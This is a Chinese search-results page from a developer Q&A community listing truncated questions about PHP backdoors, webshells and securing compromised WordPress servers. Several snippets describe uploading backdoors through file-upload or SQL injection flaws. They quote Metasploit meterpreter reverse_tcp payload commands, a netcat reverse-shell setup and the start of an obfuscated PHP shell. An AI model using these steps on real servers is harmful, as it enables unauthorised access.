腾讯云
开发者社区
文档
建议反馈
控制台
首页
学习
活动
专区
工具
TVP
最新优惠活动
文章/答案/技术大牛
搜索
搜索
关闭
发布
登录/注册
精选内容/技术社群/优惠产品,
尽在小程序
立即前往
文章
问答
(9999+)
视频
沙龙
1
回答
我的服务器安全了吗?
php
、
wordpress
、
apache
、
.htaccess
、
security
黑客攻击了一个过时的第三方编辑器(在
PHP
中),并在
PHP
中植入了一个
后门
脚本,并对我的网站造成了严重的破坏。我花了整整一个周末的时间清理
后门
脚本和他遗留在我服务器上的任何恶意代码。为了避免再次被黑客攻击,我对服务器做了以下操作: 在
PHP
中关闭file_upload。由于黑客通过
PHP
上传
了
后门
,所以我在
php
.ini中禁用了这个函数。所以现在我只能通过ftp
上传
。黑客在我的程序中添加了另一个模糊代码,并使用p
浏览 1
提问于2013-10-28
得票数 3
1
回答
这台服务器是我做的吗?
linux
、
security
表单上的照片
上传
器只接受jpegs、jpgs和png文件。我去把一张照片
上传
到我的桌面上,无意中选择了一个
PHP
文件,文件末尾有一个~。THe ~在文件名中诱使表单认为它是一个合法的文件。所以我去了Github,找到了一个
php
后门
的存储库。https://github.com/amitnaik/
php
-backdoor 我看到它有20颗星,所以我迅速浏览了代码,并没有经过双重思考就克隆了它。然后我把它
上传
到服务器上,向我的老板展
浏览 0
提问于2015-11-07
得票数 0
1
回答
WordPress插件上载默认值为777权限
wordpress
、
nginx
、
chmod
、
php
我目前在nginx/1.2.6上使用
PHP
3.5,在我的WordPress上安装了
PHP
服务器。我注意到一个主要的安全问题,每当我
上传
一个wordpress插件时,它会默认所有的目录和文件都是777权限。这意味着我需要手动更正这些文件权限。
浏览 1
提问于2013-01-07
得票数 0
回答已采纳
2
回答
Php
编码的shell代码?
php
、
obfuscation
它看起来像编码过的
php
脚本。我想看看内容或得到一个想法的脚本做什么。下面是完整的编码
php
脚本。 <?
php
$_8b7b="\x63\x72\x65\x61\x74\x65\x5f\x66\x75\x6e\x63\x74\x69\x6f\x6e";$_8b7b1f="\x62\x61\x73\x65\
浏览 3
提问于2012-02-27
得票数 1
回答已采纳
3
回答
MSFConsole/Kali Linux -获得对unix系统的根访问权
exploit
、
unix
、
kali-linux
、
bash
、
raspberry-pi
通过创建
PHP
后门
并通过SQL注入
上传
它,我成功地进入了系统(Raspberry Pi)。通过使用MSFConsole、BASH (从
后门
)或其他方式,是否有可能在Linux (拉斯拜安)中提升特权?use
php
/meterpreter/reverse_tcpgenerate -t raw -f hackme.
php
use exploit/multi/handlerset PAYLOAD <em
浏览 0
提问于2015-08-09
得票数 9
1
回答
执行一个远程
PHP
,它位于我没有访问权限的文件中
web-application
、
shellcode
、
backdoor
我试图利用
PHP
后门
进行未经消毒的文件
上传
。基本上,文件
上传
成功,我可以在web应用程序/images/目录中看到我的
后门
,但是当我单击该文件来执行它时,我会给出一个错误,声明‘许可被拒绝’。
浏览 0
提问于2014-09-03
得票数 1
1
回答
帮助理解
PHP
反向Shells
php
、
reverse-shell
我不得不将脚本从shell.
php
重命名为shell.
php
.png,因为该站点只允许我
上传
图片。再次,我获得了登录访问网站的
上传
页面。我尝试
上传
相同的反向shell脚本,但在设置netcat侦听器后无法访问。最终,我要做的是
上传
一个
php
后门
脚本:然后,我不得不利用ind
浏览 0
提问于2020-06-20
得票数 1
1
回答
后门
:
PHP
/webshell恶意软件
php
、
wordpress
、
security
、
malware
但是像往常一样,在
上传
新网站到现场环境之前,我会备份当前的实时网站。当我下载Wordpress安装时,我的windows弹出了下面的消息。发现恶意软件: 这到底是什么?这对我的电脑是危险的,还是网站的
后门
。这是怎么发生的。在这件事上,任何事情都会很有帮助。我应该在我的整个电脑上进行扫描吗?
浏览 6
提问于2017-04-26
得票数 1
回答已采纳
1
回答
对于Nginx +
PHP
,
PHP
选项'cgi.fix_pathinfo‘真的很危险吗?
nginx
、
security
、
php-fpm
、
fastcgi
一个 地段 的 倾诉讨论了与Nginx一起使用的cgi.fix_pathinfo
PHP
选项(通常为
PHP
,快速CGI)的安全问题。因此,默认的nginx配置文件用于表示:但是,现在,可以正确地处理“正式”的Nginx国家 PATH_INFO,而不必禁用上面的
PHP
选项。(官方医生刚刚说:“有关PATH_INFO的更多信息,请参阅CGI规范”)
PHP
将对这些PATH
浏览 0
提问于2014-09-11
得票数 67
回答已采纳
1
回答
存储XSS +
PHP
后门
+文件
上传
漏洞
php
、
xss
、
metasploit
我构建了这个web应用程序(使用
PHP
5+ MySQL),可以利用文件
上传
漏洞和XSS。
上传
我用msfvenom构建的
PHP
后门
打开听者/计量器 这4个步骤似乎正在工作,但一旦创建了米预会话,我甚至无法生成下面是我用来按
浏览 0
提问于2019-07-19
得票数 4
回答已采纳
1
回答
任何熟悉press87.
php
87.
php
文件的人--这是黑客吗?
php
、
wordpress
、
joomla3.0
我刚刚注意到我的服务器上的Joomla安装上有一个名为“named 87.
php
”的奇怪文件,它与任何特定的内容都没有关联。
浏览 4
提问于2015-06-27
得票数 0
回答已采纳
2
回答
wordpress网站上的错误
php
、
wordpress
嗨,我在我的wordpress网站上遇到了一个错误,比如User:Hdd: Cwd: Linux v9.cyberns.net 2.6.18-238.9.1.el5 #1Info ] [ Files ] [ Console ] [ Sql ] [
Php
] [ Safe mode ] [ String tools ] [ Bruteforce ]
浏览 2
提问于2012-03-12
得票数 0
1
回答
不是验证文件,是安全问题?
php
、
file-upload
、
upload
我只是在阅读,并发现了以下
一句话
:“不验证您操作的哪个文件可能意味着用户可以访问其他目录中的敏感信息”。 首先,它没有解释在这种情况下什么是“验证”,所以我希望有人能为我澄清这一点。
浏览 0
提问于2018-03-24
得票数 0
1
回答
怎么才能
上传
后门
?
wordpress
我正在检查一个Wordpress网站的客户端,我发现一些
后门
在webroot文件夹中存在。攻击者
上传
后门
的方式有哪些?
浏览 0
提问于2014-11-05
得票数 -1
1
回答
什么时候使用绑定shell与反向shell?
metasploit
假设您成功地获得了一个meterpreter shell并希望
上传
一个
后门
,那么您应该使用什么作为
后门
文件中的有效负载--我应该使用TCP绑定外壳还是TCP反向shell?
浏览 0
提问于2018-08-05
得票数 10
回答已采纳
1
回答
wordpress的只读模式有多安全?
wordpress
我有问题的病毒和
后门
在我的wordpress网站。 我的问题是:是什么类型的攻击,RO模式对wordpr
浏览 2
提问于2014-12-24
得票数 0
回答已采纳
1
回答
现在给它打补丁
php
、
iis-8.5
在我的
php
网站托管环境中,我发现用下面的代码创建的临时文件很少。<?
php
因为我是
php</
浏览 2
提问于2018-04-18
得票数 2
1
回答
PHP
后门
代码
php
、
apache-2.2
、
hacking
、
setenv
我在我的主机上找到了一个
php
后门
。我看到访问日志中对该
php
文件的请求是POST请求,但我不知道如何设置该变量的SETENV;是否有人能解释如何设置该变量,如果可能的话,我可以在服务器端限制/禁用设置这些变量。-H。
浏览 0
提问于2011-07-22
得票数 1
2
回答
怎么才能把
后门
送到?
backdoor
我想知道一个
后门
可以提供给某人的方式,以及各种方法的优缺点。这两种方法的优点和缺点是什么,我什么时候应该使用每种方法?
浏览 0
提问于2017-03-20
得票数 1
3
回答
无法加载请求的文件: helpers/form_helper.
php
forms
、
codeigniter
、
helper
当我在本地主机运行时,我的应用程序运行良好,但当我
上传
到web服务器时,下面有
一句话
: 这个错误的主要问题是什么?
浏览 2
提问于2013-12-31
得票数 1
点击加载更多
扫码
添加站长 进交流群
领取专属
10元无门槛券
手把手带您无忧上云
相关
资讯
php一句话后门过狗姿势万千之理论篇
PHP 文件上传
php大文件上传
PHP文件该怎么上传……
php图片上传缩放和剪裁
热门
标签
更多标签
云服务器
即时通信 IM
ICP备案
对象存储
实时音视频
活动推荐
运营活动
广告
关闭
领券